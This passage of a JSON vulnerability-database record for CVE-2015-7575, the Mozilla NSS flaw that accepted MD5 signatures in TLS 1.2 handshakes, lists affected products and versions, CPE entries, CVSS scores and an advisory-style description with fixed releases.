"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.10" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.21" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "19.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "14.0.1" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "marketing operations", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "netezza diagnostics tools", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.1" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.26" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "32.0.3" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.4" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.7" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.5" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.4" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "decision optimization center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.7" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9" }, { "model": "rational publishing engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.10" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "sterling secure proxy ifix05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.6" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.28" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.0.6" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational developer for c/c++", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.39" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system networking switch center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.2.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "1/10gb uplink ethernet switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.8.24.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.3" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.24" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.4" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.8" }, { "model": "omnifind enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.7" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16.0.0.0" }, { "model": "marketing platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.1" }, { "model": "websphere real time sr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "39" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "mq appliance m2000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "elastic storage server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "23.0" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.86" }, { "model": "system networking rackswitch g8264t", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "1/10gb uplink ethernet switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.13.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.15.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.19" }, { "model": "virtual fabric 10gb switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "7.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.7" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6.0.1" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.3" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "snapcenter plug-in for microsoft sql server", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.12" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.4" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.5.3" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "system networking rackswitch g8264", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.19" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.16" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.3.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.10" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "watson explorer annotation administration console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "system networking rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.4" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.6" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "virtual fabric 10gb switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.9.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.9" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "23.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.11" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.9" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "34.0.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "5.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "21.0" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "marketing platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.2" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.18" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "38.2" }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.1.237" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.35" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.14" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.7" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.3" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.12" }, { "model": "oncommand unified manager for clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "6.0" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.2" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "filenet business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.1" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "storage services connector", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.1.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.0" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "watson explorer analytical components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "websphere real time sr9 fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.01" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.33" }, { "model": "system networking rackswitch g8124-e", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "websphere business events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.34" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.6.0.3" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.5.0.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.14.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.8" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.0.0.2" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" } ], "sources": [ { "db": "BID", "id": "79684" }, { "db": "NVD", "id": "CVE-2015-7575" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mozilla:network_security_services:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "3.20.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mozilla:firefox_esr:38.0.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "43.0.1", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-7575" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Karthikeyan Bhargavan", "sources": [ { "db": "BID", "id": "79684" } ], "trust": 0.3 }, "cve": "CVE-2015-7575", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2015-7575", "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-7575", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-7575", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7575" }, { "db": "NVD", "id": "CVE-2015-7575" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mozilla Network Security Services (NSS) before 3.20.2, as used in Mozilla Firefox before 43.0.2 and Firefox ESR 38.x before 38.5.2, does not reject MD5 signatures in Server Key Exchange messages in TLS 1.2 Handshake Protocol traffic, which makes it easier for man-in-the-middle attackers to spoof servers by triggering a collision. Mozilla Network Security Services is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. \nThis issue is fixed in:\nFirefox 43.0.2\nFirefox ESR 38.5.2\nNetwork Security Services 3.20.2. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201701-46\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n 